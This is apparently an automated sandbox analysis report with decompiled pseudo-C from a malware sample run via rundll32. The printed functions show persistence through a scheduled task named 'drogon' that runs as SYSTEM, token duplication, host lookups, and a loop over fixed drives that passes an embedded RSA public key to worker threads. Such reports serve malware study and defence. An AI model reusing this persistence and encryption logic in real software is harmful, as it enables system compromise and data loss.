                                                                                                                                                  0x04778295
                                                                                                                                                  0x04778296
                                                                                                                                                  0x0477829c
                                                                                                                                                  0x047782ab
                                                                                                                                                  0x047782b7
                                                                                                                                                  0x047782ce
                                                                                                                                                  0x047782e0
                                                                                                                                                  0x047782e5
                                                                                                                                                  0x047782e5
                                                                                                                                                  0x047782b7
                                                                                                                                                  0x047782e8
                                                                                                                                                  0x047782ed

                                                                                                                                                  APIs
                                                                                                                                                  • GetLocalTime.KERNEL32(?,00000000), ref: 047781AF
                                                                                                                                                    • Part of subcall function 04776477: GetTickCount.KERNEL32 ref: 04776477
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 047781F2
                                                                                                                                                  • PathAppendW.SHLWAPI(?,?), ref: 047782AF
                                                                                                                                                  • wsprintfW.USER32 ref: 047782CE
                                                                                                                                                    • Part of subcall function 04777FB7: wsprintfW.USER32 ref: 04777FD6
                                                                                                                                                    • Part of subcall function 04777FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04777FFA
                                                                                                                                                    • Part of subcall function 04777FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0477800C
                                                                                                                                                    • Part of subcall function 04777FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04778022
                                                                                                                                                    • Part of subcall function 04777FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04778069
                                                                                                                                                    • Part of subcall function 04777FB7: Sleep.KERNELBASE(00000000), ref: 0477807F
                                                                                                                                                  Strings
                                                                                                                                                  • schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00, xrefs: 047782C8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DirectorySystemwsprintf$AppendCountCreateEnvironmentLocalPathProcessSleepTickTimeVariablelstrcat
                                                                                                                                                  • String ID: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
                                                                                                                                                  • API String ID: 2586884543-3727968613
                                                                                                                                                  • Opcode ID: f088d9c738863141c884cf6026f85259cb801be3e115dd93f41d91ab7759e79e
                                                                                                                                                  • Instruction ID: d52a9c901c6919b36862603e1d0986509e06e70ab2b087cf74fa9eaa421d9ae8
                                                                                                                                                  • Opcode Fuzzy Hash: f088d9c738863141c884cf6026f85259cb801be3e115dd93f41d91ab7759e79e
                                                                                                                                                  • Instruction Fuzzy Hash: 0941C822A58348A9FB10DBE4EC1ABFE7375EF84B10F10541BE604FB2D0E6B55A84C359
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                  			E0477A016(void* _a7312, void* _a7316, void* _a7324) {
                                                                                                                                                  				short _v36;
                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                  				void* _v44;
                                                                                                                                                  				void* _v48;
                                                                                                                                                  				char _v64;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				int _t21;
                                                                                                                                                  				HANDLE* _t23;
                                                                                                                                                  				HANDLE* _t51;
                                                                                                                                                  
                                                                                                                                                  				_v48 = 0;
                                                                                                                                                  				_v44 = 0;
                                                                                                                                                  				_t21 = OpenThreadToken(GetCurrentThread(), 0xb, 1,  &_v48);
                                                                                                                                                  				_t57 = _t21;
                                                                                                                                                  				if(_t21 != 0) {
                                                                                                                                                  					DuplicateTokenEx(_v48, 0x2000000, 0, 2, 2,  &_v44);
                                                                                                                                                  				}
                                                                                                                                                  				_v40 =  *0x4787bb8;
                                                                                                                                                  				_t23 = E04776C5F(0x24, E04776AA8, 0, 0xffff); // executed
                                                                                                                                                  				_t51 = _t23;
                                                                                                                                                  				E047775D8(_t51, 0); // executed
                                                                                                                                                  				E047776F2(_t51); // executed
                                                                                                                                                  				E04776CC8(_t51);
                                                                                                                                                  				_t45 = _t51;
                                                                                                                                                  				_t43 = E04776B0E(_t51, _t57,  &_v64);
                                                                                                                                                  				if(_t28 != 0) {
                                                                                                                                                  					do {
                                                                                                                                                  						if(E04779534( &_v36, 0, 0, 0) != 0) {
                                                                                                                                                  							E04776B5F( &_v36, _t51, _t43);
                                                                                                                                                  							_t45 =  &_v44;
                                                                                                                                                  							E04776B5F( &_v44, _v48, 0);
                                                                                                                                                  						}
                                                                                                                                                  						_v36 = 0;
                                                                                                                                                  					} while (E04776AD0(_t45,  &_v36) != 0);
                                                                                                                                                  					E04776B46(_t43);
                                                                                                                                                  				}
                                                                                                                                                  				if(_v48 != 0) {
                                                                                                                                                  					CloseHandle(_v48);
                                                                                                                                                  					_v48 = 0;
                                                                                                                                                  				}
                                                                                                                                                  				if(_v44 != 0) {
                                                                                                                                                  					CloseHandle(_v44);
                                                                                                                                                  				}
                                                                                                                                                  				return 0;
                                                                                                                                                  			}












                                                                                                                                                  0x0477a02d
                                                                                                                                                  0x0477a031
                                                                                                                                                  0x0477a03c
                                                                                                                                                  0x0477a042
                                                                                                                                                  0x0477a044
                                                                                                                                                  0x0477a059
                                                                                                                                                  0x0477a059
                                                                                                                                                  0x0477a071
                                                                                                                                                  0x0477a075
                                                                                                                                                  0x0477a07a
                                                                                                                                                  0x0477a07e
                                                                                                                                                  0x0477a084
                                                                                                                                                  0x0477a089
                                                                                                                                                  0x0477a093
                                                                                                                                                  0x0477a09a
                                                                                                                                                  0x0477a09e
                                                                                                                                                  0x0477a0a0
                                                                                                                                                  0x0477a0af
                                                                                                                                                  0x0477a0b7
                                                                                                                                                  0x0477a0c1
                                                                                                                                                  0x0477a0c5
                                                                                                                                                  0x0477a0c5
                                                                                                                                                  0x0477a0cc
                                                                                                                                                  0x0477a0db
                                                                                                                                                  0x0477a0e0
                                                                                                                                                  0x0477a0e0
                                                                                                                                                  0x0477a0ef
                                                                                                                                                  0x0477a0f5
                                                                                                                                                  0x0477a0f7
                                                                                                                                                  0x0477a0f7
                                                                                                                                                  0x0477a0ff
                                                                                                                                                  0x0477a105
                                                                                                                                                  0x0477a105
                                                                                                                                                  0x0477a10f

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0477A035
                                                                                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0477A1D0,00000000), ref: 0477A03C
                                                                                                                                                  • DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 0477A059
                                                                                                                                                  • CloseHandle.KERNEL32(?,04776AA8,00000000,00000000,00000000,00000024,04776AA8,00000000,0000FFFF), ref: 0477A0F5
                                                                                                                                                  • CloseHandle.KERNEL32(0000FFFF,04776AA8,00000000,00000000,00000000,00000024,04776AA8,00000000,0000FFFF), ref: 0477A105
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseHandleThreadToken$CurrentDuplicateOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3602278934-0
                                                                                                                                                  • Opcode ID: 544faf390371b7c6fec707b9cd4df176052019774bd89fe25e1a6b8d42feaa44
                                                                                                                                                  • Instruction ID: 3f9a1280ef89544d3fb5bcd88f653113b6247cc7d956cd8bcecbe931f372bdf9
                                                                                                                                                  • Opcode Fuzzy Hash: 544faf390371b7c6fec707b9cd4df176052019774bd89fe25e1a6b8d42feaa44
                                                                                                                                                  • Instruction Fuzzy Hash: 6621A0716043016BEA20EF619C48EAFBBECEFC5714F904D2DB540D2255EA34F904CBA2
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                  			E04779376(short* _a4, short* _a8) {
                                                                                                                                                  				int _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				char _v284;
                                                                                                                                                  				char _v548;
                                                                                                                                                  				char _v1068;
                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                  				short* _t20;
                                                                                                                                                  				char* _t25;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  
                                                                                                                                                  				_v16 =  *0x4787b94;
                                                                                                                                                  				_t19 =  *0x4783984; // 0x2ff54d0
                                                                                                                                                  				_v12 = _t19;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_t20 = PathFindFileNameW(0x4787bc8);
                                                                                                                                                  				if(_t20 != 0) {
                                                                                                                                                  					_t35 =  &_v548;
                                                                                                                                                  					WideCharToMultiByte(0xfde9, 0, _t20, 0xffffffff,  &_v548, 0x104, 0, 0);
                                                                                                                                                  					WideCharToMultiByte(0xfde9, 0, _a4, 0xffffffff,  &_v284, 0x104, 0, 0);
                                                                                                                                                  					_t25 =  &_v284;
                                                                                                                                                  					__imp__#11(_t25);
                                                                                                                                                  					if(_t25 != 0xffffffff || E04779332( &_v284,  &_v284) != 0) {
                                                                                                                                                  						WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff,  &_v1068, 0x208, 0, 0);
                                                                                                                                                  						_t31 = E04775337(_t35,  &_v284,  &_v1068,  &_v548, _v12, _v16); // executed
                                                                                                                                                  						if(_t31 == 0) {
                                                                                                                                                  							_v8 = 1;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _v8;
                                                                                                                                                  			}













                                                                                                                                                  0x04779387
                                                                                                                                                  0x0477938a
                                                                                                                                                  0x04779396
                                                                                                                                                  0x04779399
                                                                                                                                                  0x0477939c
                                                                                                                                                  0x047793a4
                                                                                                                                                  0x047793b7
                                                                                                                                                  0x047793c8
                                                                                                                                                  0x047793df
                                                                                                                                                  0x047793e1
                                                                                                                                                  0x047793e8
                                                                                                                                                  0x047793f1
                                                                                                                                                  0x04779418
                                                                                                                                                  0x04779435
                                                                                                                                                  0x0477943c
                                                                                                                                                  0x0477943e
                                                                                                                                                  0x0477943e
                                                                                                                                                  0x0477943c
                                                                                                                                                  0x047793f1
                                                                                                                                                  0x0477944c

                                                                                                                                                  APIs
                                                                                                                                                  • PathFindFileNameW.SHLWAPI(04787BC8,?,00000000,00000000), ref: 0477939C
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000104,00000000,00000000), ref: 047793C8
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 047793DF
                                                                                                                                                  • inet_addr.WS2_32(?), ref: 047793E8
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000208,00000000,00000000), ref: 04779418
                                                                                                                                                    • Part of subcall function 04779332: gethostbyname.WS2_32(047793FF), ref: 0477933B
                                                                                                                                                    • Part of subcall function 04779332: wsprintfA.USER32 ref: 04779365
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide$FileFindNamePathgethostbynameinet_addrwsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3160354238-0
                                                                                                                                                  • Opcode ID: 49c040953dbeaaa0b4d4ab4ff12026ee94852a6e9db41915d95dba86c03b71d0
                                                                                                                                                  • Instruction ID: 36ec1348584038f6e90bf61becf0e62546657d0a87670d4208b787eb25b0a186
                                                                                                                                                  • Opcode Fuzzy Hash: 49c040953dbeaaa0b4d4ab4ff12026ee94852a6e9db41915d95dba86c03b71d0
                                                                                                                                                  • Instruction Fuzzy Hash: BF212CF290011CBEEF50DA94DCC4DEF7BBCEB44364F5042A9F624E2190DA74AE458BA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04776C5F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				signed int _t14;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  				struct _CRITICAL_SECTION* _t24;
                                                                                                                                                  
                                                                                                                                                  				_t24 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                                                                  				if(_t24 != 0) {
                                                                                                                                                  					InitializeCriticalSection(_t24);
                                                                                                                                                  					_t14 = _a16;
                                                                                                                                                  					 *(_t24 + 0x20) = _t14;
                                                                                                                                                  					 *((intOrPtr*)(_t24 + 0x1c)) = _a4;
                                                                                                                                                  					 *((intOrPtr*)(_t24 + 0x2c)) = _a8;
                                                                                                                                                  					_t22 = _a12;
                                                                                                                                                  					 *((intOrPtr*)(_t24 + 0x24)) = 0;
                                                                                                                                                  					 *((intOrPtr*)(_t24 + 0x30)) = _a12;
                                                                                                                                                  					_t17 = RtlAllocateHeap(GetProcessHeap(), 8, _t14 << 2); // executed
                                                                                                                                                  					 *(_t24 + 0x18) = _t17;
                                                                                                                                                  					if(_t17 == 0) {
                                                                                                                                                  						E04776BD1(_t22, _t24);
                                                                                                                                                  						_t24 = 0;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t24;
                                                                                                                                                  			}







                                                                                                                                                  0x04776c7a
                                                                                                                                                  0x04776c7e
                                                                                                                                                  0x04776c81
                                                                                                                                                  0x04776c87
                                                                                                                                                  0x04776c8d
                                                                                                                                                  0x04776c90
                                                                                                                                                  0x04776c99
                                                                                                                                                  0x04776c9c
                                                                                                                                                  0x04776ca2
                                                                                                                                                  0x04776ca9
                                                                                                                                                  0x04776caf
                                                                                                                                                  0x04776cb1
                                                                                                                                                  0x04776cb6
                                                                                                                                                  0x04776cb8
                                                                                                                                                  0x04776cbd
                                                                                                                                                  0x04776cbd
                                                                                                                                                  0x04776cb6
                                                                                                                                                  0x04776cc5

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000034,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C6F
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C78
                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C81
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776CAC
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776CAF
                                                                                                                                                    • Part of subcall function 04776BD1: GetProcessHeap.KERNEL32(00000000,?,74CB4F20,778C4620,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C29
                                                                                                                                                    • Part of subcall function 04776BD1: HeapFree.KERNEL32(00000000,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C2C
                                                                                                                                                    • Part of subcall function 04776BD1: GetProcessHeap.KERNEL32(00000000,?,74CB4F20,778C4620,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C39
                                                                                                                                                    • Part of subcall function 04776BD1: HeapFree.KERNEL32(00000000,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C3C
                                                                                                                                                    • Part of subcall function 04776BD1: GetProcessHeap.KERNEL32(00000000,?,74CB4F20,778C4620,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C4E
                                                                                                                                                    • Part of subcall function 04776BD1: HeapFree.KERNEL32(00000000,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C51
                                                                                                                                                    • Part of subcall function 04776BD1: GetProcessHeap.KERNEL32(00000000,00000000,74CB4F20,778C4620,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C56
                                                                                                                                                    • Part of subcall function 04776BD1: HeapFree.KERNEL32(00000000,?,?,04776CBD,?,?,00000000,?,04777A55,00000024,04776AA8,00000000,0000FFFF), ref: 04776C59
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$Free$AllocAllocateCriticalInitializeSection
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1652351593-0
                                                                                                                                                  • Opcode ID: 4beaba4b9399bf9a9ca485286c485b0bbc58577a718338e766c82259d8e060c9
                                                                                                                                                  • Instruction ID: 6b743f14e3a87c5b9acf6ef1d66003af99bb4abf66cd1b6543b1a5be8f0a8793
                                                                                                                                                  • Opcode Fuzzy Hash: 4beaba4b9399bf9a9ca485286c485b0bbc58577a718338e766c82259d8e060c9
                                                                                                                                                  • Instruction Fuzzy Hash: 09014B716007146BD720DFAAD840A5BBBE8FF89760F41451AEA49D7340DB70E804CBA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0477A420(void* __ecx, void _a4) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				void* _t9;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_t20 = HeapAlloc(GetProcessHeap(), 8, 4);
                                                                                                                                                  				if(_t20 != 0) {
                                                                                                                                                  					 *_t20 = _a4; // executed
                                                                                                                                                  					_t9 = CreateThread(0, 0, E0477A333, _t20, 0, 0); // executed
                                                                                                                                                  					_v8 = _t9;
                                                                                                                                                  					if(_t9 == 0) {
                                                                                                                                                  						HeapFree(GetProcessHeap(), 0, _t20);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _v8;
                                                                                                                                                  			}






                                                                                                                                                  0x0477a433
                                                                                                                                                  0x0477a43f
                                                                                                                                                  0x0477a443
                                                                                                                                                  0x0477a452
                                                                                                                                                  0x0477a454
                                                                                                                                                  0x0477a45a
                                                                                                                                                  0x0477a45f
                                                                                                                                                  0x0477a466
                                                                                                                                                  0x0477a466
                                                                                                                                                  0x0477a45f
                                                                                                                                                  0x0477a473

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000004,74CB43E0,?,00000000,?,?,04777B89,000000FF), ref: 0477A436
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,04777B89,000000FF), ref: 0477A439
                                                                                                                                                  • CreateThread.KERNELBASE ref: 0477A454
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,04777B89,000000FF), ref: 0477A463
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,04777B89,000000FF), ref: 0477A466
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocCreateFreeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3966119241-0
                                                                                                                                                  • Opcode ID: b0b4b32d572acd3aef3479479543225fd726d8085b5379a8d02648ba9d311ed1
                                                                                                                                                  • Instruction ID: 3e5f164957fe10a430cf5f9c023398379db80183db0d25e1864c3965f787b398
                                                                                                                                                  • Opcode Fuzzy Hash: b0b4b32d572acd3aef3479479543225fd726d8085b5379a8d02648ba9d311ed1
                                                                                                                                                  • Instruction Fuzzy Hash: EFF030F1600218BFEB206FA59D8CCDFBFACEF85294B508429F60293200D5789D05CAA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                  			E0477636B(void* _a4, intOrPtr _a8) {
                                                                                                                                                  				signed char _v8;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				short _v14;
                                                                                                                                                  				short _v16;
                                                                                                                                                  				short _v18;
                                                                                                                                                  				short _v20;
                                                                                                                                                  				long _t24;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  				short _t30;
                                                                                                                                                  				short _t31;
                                                                                                                                                  				void* _t34;
                                                                                                                                                  				void _t35;
                                                                                                                                                  				signed char _t36;
                                                                                                                                                  				signed int _t40;
                                                                                                                                                  				void* _t47;
                                                                                                                                                  
                                                                                                                                                  				_t35 =  *0x4787bbc;
                                                                                                                                                  				_t24 = GetLogicalDrives(); // executed
                                                                                                                                                  				_v12 = _t24;
                                                                                                                                                  				_v8 = 0x1f;
                                                                                                                                                  				do {
                                                                                                                                                  					_t36 = _v8;
                                                                                                                                                  					_t27 = 1 << _t36;
                                                                                                                                                  					if((_v12 & 1) != 0) {
                                                                                                                                                  						_v20 = _t36 + 0x41;
                                                                                                                                                  						_t30 = 0x3a;
                                                                                                                                                  						_v18 = _t30;
                                                                                                                                                  						_t31 = 0x5c;
                                                                                                                                                  						_v16 = _t31;
                                                                                                                                                  						_v14 = 0;
                                                                                                                                                  						_t27 = GetDriveTypeW( &_v20); // executed
                                                                                                                                                  						if(_t27 == 3) {
                                                                                                                                                  							_t27 = LocalAlloc(0x40, 0x50);
                                                                                                                                                  							if(_t27 != 0) {
                                                                                                                                                  								 *((intOrPtr*)(_t27 + 0x4c)) = _a8;
                                                                                                                                                  								 *_t27 = _t35;
                                                                                                                                                  								 *(_t27 + 0x34) = L"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB";
                                                                                                                                                  								 *(_t27 + 4) = _v20;
                                                                                                                                                  								 *((intOrPtr*)(_t27 + 8)) = _v16;
                                                                                                                                                  								_t40 = 8;
                                                                                                                                                  								_t20 = _t27 + 0xc; // 0xc
                                                                                                                                                  								_t34 = memcpy(_t20, _a4, _t40 << 2);
                                                                                                                                                  								_t47 = _t47 + 0xc;
                                                                                                                                                  								asm("movsb"); // executed
                                                                                                                                                  								_t27 = CreateThread(0, 0, E04776299, _t34, 0, 0); // executed
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t22 =  &_v8;
                                                                                                                                                  					 *_t22 = _v8 - 1;
                                                                                                                                                  				} while ( *_t22 >= 0);
                                                                                                                                                  				return _t27;
                                                                                                                                                  			}


















                                                                                                                                                  0x04776372
                                                                                                                                                  0x0477637a
                                                                                                                                                  0x04776380
                                                                                                                                                  0x04776383
                                                                                                                                                  0x0477638a
                                                                                                                                                  0x0477638a
                                                                                                                                                  0x04776390
                                                                                                                                                  0x04776395
                                                                                                                                                  0x0477639e
                                                                                                                                                  0x047763a2
                                                                                                                                                  0x047763a3
                                                                                                                                                  0x047763a9
                                                                                                                                                  0x047763aa
                                                                                                                                                  0x047763b0
                                                                                                                                                  0x047763b8
                                                                                                                                                  0x047763c1
                                                                                                                                                  0x047763c7
                                                                                                                                                  0x047763d1
                                                                                                                                                  0x047763d9
                                                                                                                                                  0x047763dc
                                                                                                                                                  0x047763de
                                                                                                                                                  0x047763ea
                                                                                                                                                  0x047763f0
                                                                                                                                                  0x047763f3
                                                                                                                                                  0x047763f4
                                                                                                                                                  0x047763f8
                                                                                                                                                  0x047763f8
                                                                                                                                                  0x04776403
                                                                                                                                                  0x04776404
                                                                                                                                                  0x04776404
                                                                                                                                                  0x047763d1
                                                                                                                                                  0x047763c1
                                                                                                                                                  0x0477640a
                                                                                                                                                  0x0477640a
                                                                                                                                                  0x0477640a
                                                                                                                                                  0x04776417

                                                                                                                                                  APIs
                                                                                                                                                  • GetLogicalDrives.KERNELBASE ref: 0477637A
                                                                                                                                                  • GetDriveTypeW.KERNELBASE(?), ref: 047763B8
                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000050), ref: 047763C7
                                                                                                                                                  • CreateThread.KERNELBASE ref: 04776404
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocCreateDriveDrivesLocalLogicalThreadType
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2320387513-0
                                                                                                                                                  • Opcode ID: 154495778266e94c5fb6ccbb748cf9bb8ff00217b1fa752c3fc3ddd8a5140314
                                                                                                                                                  • Instruction ID: 70451041c0be123631203e40940cc2f5b13af2385d9aba04c37348a97d8a2300
                                                                                                                                                  • Opcode Fuzzy Hash: 154495778266e94c5fb6ccbb748cf9bb8ff00217b1fa752c3fc3ddd8a5140314
                                                                                                                                                  • Instruction Fuzzy Hash: 29118475A40204AFDB00DFA4D845AAEB7B5FF88721F51C45EE505EB381D730AA41CB54
